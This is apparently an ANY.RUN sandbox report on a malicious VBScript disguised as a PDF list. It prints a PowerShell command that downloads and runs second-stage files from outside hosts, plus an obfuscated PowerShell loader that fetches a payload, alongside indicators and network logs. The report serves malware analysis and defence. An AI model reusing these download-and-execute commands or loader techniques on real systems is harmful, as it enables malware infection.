File name:

Listofrequireditemsandservicespdf.vbs

Full analysis: https://app.any.run/tasks/46a1ff9e-7920-461f-9798-b542e7fa719c
Verdict: Malicious activity
Analysis date: December 09, 2024, 17:51:10
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (2731), with CRLF line terminators
MD5:

32AABCE75F3FD75D0ECF7743BC6B9AFF

SHA1:

0F715B1CEAFEDDD4C80B294E91EC476AE3E8C0D0

SHA256:

21BEB442551B46EFBB7727A20784E6F047B4321DD3D8CCFCA94C256B9AD6E0BE

SSDEEP:

48:TJafb+vKVySHj3lS+Dkh1SFFMS1SBc24LlSMBbuSBlSMCSwVERbuSBBUS1R+nK:W6KjIXGno0nuSb+K

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 4128)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 5728)
      • wscript.exe (PID: 3688)
    • Likely accesses (executes) a file from the Public directory

      • powershell.exe (PID: 1668)
      • wscript.exe (PID: 3688)
      • EXCEL.EXE (PID: 1224)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5728)
      • wscript.exe (PID: 3688)
    • Starts process via Powershell

      • powershell.exe (PID: 1668)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 1668)
    • The process executes VB scripts

      • powershell.exe (PID: 1668)
    • Uses WMIC.EXE to obtain physical disk drive information

      • wscript.exe (PID: 3688)
    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 3688)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 4128)
      • powershell.exe (PID: 4244)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4128)
      • powershell.exe (PID: 4244)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 4128)
      • powershell.exe (PID: 4244)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 4244)
    • Connects to unusual port

      • svchost.exe (PID: 4976)
    • The process checks if it is being run in the virtual environment

      • svchost.exe (PID: 4976)
  • INFO

    • The process uses the downloaded file

      • wscript.exe (PID: 5728)
      • powershell.exe (PID: 1668)
    • Disables trace logs

      • powershell.exe (PID: 1668)
      • powershell.exe (PID: 4128)
    • Checks proxy server information

      • powershell.exe (PID: 1668)
      • powershell.exe (PID: 4128)
      • msiexec.exe (PID: 2260)
    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 2324)
      • msiexec.exe (PID: 2260)
    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 3688)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4128)
      • powershell.exe (PID: 4244)
    • Manual execution by a user

      • powershell.exe (PID: 4244)
      • svchost.exe (PID: 4976)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4244)
      • powershell.exe (PID: 4128)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4244)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4244)
    • Reads the software policy settings

      • msiexec.exe (PID: 2260)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
134
Monitored processes
13
Malicious processes
5
Suspicious processes
1

Behavior graph

Processes shown in the behavior graph, in the order listed by the report ("no specs" is the report's own label for nodes without specific indicators): start, wscript.exe (no specs), powershell.exe, conhost.exe (no specs), wscript.exe (no specs), wmic.exe (no specs), conhost.exe (no specs), powershell.exe, conhost.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), excel.exe, msiexec.exe, svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 1224
CMD: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\lsm5k8gou5bjv.xlsx"
Path: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
PID: 1668
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx'
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2260
CMD: "C:\WINDOWS\SysWOW64\msiexec.exe"
Path: C:\Windows\SysWOW64\msiexec.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID: 2324
CMD: wmic diskdrive get caption,serialnumber
Path: C:\Windows\System32\wbem\WMIC.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
PID: 2972
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3688
CMD: "C:\WINDOWS\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3816
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3848
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: WMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3952
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4128"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. 
uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelButK ePhsCr1M 9 T1') ;Allestedsnrvrende $Linievogternes;Allestedsnrvrende (ectethmoid 'SesLiT,eAForC.TPl-SgSEllSaE,ve nPEm I 4');Allestedsnrvrende (ectethmoid 'Ko$ ,GellBaoAvBJoaFrl p:S cUdI VBlI llnobR EUdSknk By otTrtSteLaLThSToE s G=Tr(M.T TETesCotUn-,lpFuaFatToh i Re$O.bPeEB.g YMen DDBoeS LN SG.EC s LVii on ojI ESkRliN .e B1As0F.9Ar)') ;Allestedsnrvrende (ectethmoid ' M$JeG RLU.oSybBiA .LTi: JrAlE GKoI.lsAftnirSuEScrB.iHinHoGOpSUnNS UEnMA MAreSpr.us F=En$M,G iLNooLgb nA.alM.:J KFlNNeu aB .SLiE.o+Ru+ r%Un$ NSP 
VFoiUnNMee SUn. CCaoG Ud NInt') ;$agreed=$Svines[$Registreringsnummers]}$Djvelskabers=282895;$Unpreparedness=28214;Allestedsnrvrende (ectethmoid 'H $ChGafL OH,bRaa ,l.e:BoSHeH ,yDylOpOBoC ek TeS d I sa=K igEkE BtH - FCDooRenInt FeIln HtCr Ti$FiB Nep,gU yE NTaDB E Il BSIneM,SLel LiMinI j.aeA.RFrNAne,u1.g0Ge9');Allestedsnrvrende (ectethmoid 'Pr$ g Dl,oo BbNaaPslRe:poD AdSvnS iCan,ygtje ,n W ,d=Un k[AfSIsy .sInt EeM mSk. SCBao an LvB eTyrmotE ]Ma:Bo: MF Fr ,oPhm BA asesHuePr6Ma4KrSKotCrr .i.unA.gS.(Co$,aSS hhyyG lMoosycRek ee adOv)');Allestedsnrvrende (ectethmoid 'Pa$Hjg BlD,o FB,nALalOc: ,kDka.inBut HsC.TPoeO n eLonEfS i Bo= I M,[FossaYFeSUnt EUnMCo.KaT.ee .xChTG .,deGrNReCBoOPrd .iR ND G ] F:.a: HaReS.ac EIchIGr.l gTleStt s Ct eRVeiF n fg.a(Fo$HiDFrdAlnAnI,eNcrgpoEDinhy)');Allestedsnrvrende (ectethmoid 'Ca$,ogbol eOMoBXaA CLMa:m tmaI ,lErSBrKStA dAiEA,KP O UmDaNEpeMo=F $EgKSeaHjN nT S eT PeRon Be,lnWasth. iS eUU BS sAltCorR iStn MGS (Fo$PedInjDav E ClM sSekEmaU.B GeFlRDiSBu,Sa$Beu NnUnpB,rGae,np EA Fr.eE iDErNEne .sM Ssn)');Allestedsnrvrende $Tilskadekomne;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events
33 100
Read events
32 854
Write events
225
Delete events
21

Modification events

(PID) Process: (1668) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation: write
Name: VBSFile
Value:
(PID) Process: (1668) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation: write
Name: {33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
Value:
0100000000000000D3818DFE624ADB01
(PID) Process: (1668) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsx\OpenWithProgids
Operation: write
Name: Excel.Sheet.12
Value:
(PID) Process: (1224) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation: write
Name: 1
Value:
01D014000000001000B24E9A3E02000000000000000600000000000000
(PID) Process: (1224) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\1224
Operation: write
Name: 0
Value:
0B0E106365FD851A500D41B6AE2FD715A3D663230046B2D5E695B0CCD2ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511C809D2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process: (1224) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: en-US
Value: 2
(PID) Process: (1224) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: de-de
Value: 2
(PID) Process: (1224) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: fr-fr
Value: 2
(PID) Process: (1224) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: es-es
Value: 2
(PID) Process: (1224) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: it-it
Value: 2
Executable files
1
Suspicious files
16
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 1668
Process: powershell.exe
Filename: C:\Users\Public\udkz59n9.vbs
Type: text
MD5:08450E7F899444A80F64E7AEFEBDC278
SHA256:E4801D7FB5B9EB28FB32971B2935FB6A22EEC84F892FA724EDB5E6586110B507
PID: 4128
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_piwvxdxm.3lo.psm1
Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 4128
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5:5FC9862ED736A8FAD361C671F913ACA8
SHA256:434E774E0F8B077C64EBA3ABCB47C8A73EA98B963B91259D4E18E3E9D99C978B
PID: 1668
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aswrxrjl.ay5.psm1
Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 4128
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kkxp1nne.y0l.ps1
Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 4128
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Exultet.Bid
Type: text
MD5:1C8EEA62BA17FC6DBA580BF2838B9E5A
SHA256:1B924838E7940222DCC7E76C15139882D57D0C0A3F3E8D14BA5C370EA5C8708F
PID: 1668
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_taqru0hi.lxe.ps1
Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 1224
Process: EXCEL.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\CF0C706C-BA7E-4CD5-9AAB-AE4FA5076384
Type: xml
MD5:8113C711AFF492D2A716A27DDB6ED1E5
SHA256:F97FE5D63648DB936B3B8A34D140EFE411DA991C77769C5B287F2BB447773292
PID: 1224
Process: EXCEL.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres
Type: binary
MD5:1D950761921920766E7432100CAFE750
SHA256:0B91674674AF5002E186BD2EBF6BB23CDF8D5E64CE40FE92043419264E98EA5F
PID: 4244
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5poqupwn.jgu.psm1
Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
17
TCP/UDP connections
39
DNS requests
15
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
184.24.77.35:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2220
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
HEAD
200
23.32.100.39:443
https://uci.cdn.office.net/mirrored/smartlookup/current/version.json
unknown
GET
200
52.113.194.132:443
https://ecs.office.com/config/v2/Office/excel/16.0.16026.20146/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.16026.20146&MsoVersion=16.0.16026.20002&SDX=fa000000002.2.0.1907.31003&SDX=fa000000005.1.0.1909.30011&SDX=fa000000006.1.0.1909.13002&SDX=fa000000008.1.0.1908.16006&SDX=fa000000009.1.0.1908.6002&SDX=fa000000016.1.0.1810.13001&SDX=fa000000029.1.0.1906.25001&SDX=fa000000033.1.0.1908.24001&SDX=wa104381125.1.0.1810.9001&ProcessName=excel.exe&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=6&LicenseSKU=Professional2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7b85FD6563-501A-410D-B6AE-2FD715A3D663%7d&LabMachine=false
unknown
tss
370 Kb
whitelisted
GET
200
52.109.76.240:443
https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16026&crev=3
unknown
xml
177 Kb
whitelisted
GET
200
209.124.66.28:443
https://www.tequila.ae/wh/wh.vbs
unknown
text
32.2 Kb
GET
200
93.95.216.175:443
https://www.fornid.com/ab/List%20of%20required%20items.xlsx
unknown
document
7.91 Kb
GET
200
103.53.42.63:443
https://www.ftsengineers.com/it/Emnernes123.mdp
unknown
text
405 Kb
GET
200
52.111.236.4:443
https://messaging.lifecycle.office.com/getcustommessage16?app=1&ui=en-US&src=BizBar&messagetype=BizBar&hwid=04111-083-043729&ver=16.0.16026&lc=en-US&platform=10%3A0%3A19045%3A2%3A0%3A0%3A256%3A1%3A&productid=%7B1717C1E0-47D3-4899-A6D3-1022DB7415E0%7D%3A00411-10830-43729-AA720%3AOffice%2019%2C%20Office19Professional2019R_Retail%20edition&clientsessionid=%7B85FD6563-501A-410D-B6AE-2FD715A3D663%7D&datapropertybag=%7B%22Audience%22%3A%22Production%22%2C%22AudienceGroup%22%3A%22Production%22%2C%22AudienceChannel%22%3A%22CC%22%2C%22Flight%22%3A%22ofsh6c2b1tla1a31%2Cofcrui4yvdulbf31%2Cofhpex3jznepoo31%2Cofpioygfqmufst31%2Cofaa1msspvo2xw31%22%7D
unknown
text
542 b
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2220
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
184.24.77.35:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2220
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
1668
powershell.exe
209.124.66.28:443
www.tequila.ae
A2HOSTING
US
unknown
3976
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
whitelisted
google.com
  • 172.217.16.142
whitelisted
crl.microsoft.com
  • 184.24.77.35
  • 184.24.77.12
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
www.tequila.ae
  • 209.124.66.28
unknown
www.ftsengineers.com
  • 103.53.42.63
unknown
www.fornid.com
  • 93.95.216.175
unknown
officeclient.microsoft.com
  • 52.109.76.240
whitelisted
ecs.office.com
  • 52.113.194.132
whitelisted
messaging.lifecycle.office.com
  • 52.111.236.4
whitelisted

Threats

PID
Process
Class
Message
4976
svchost.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 5
No debug info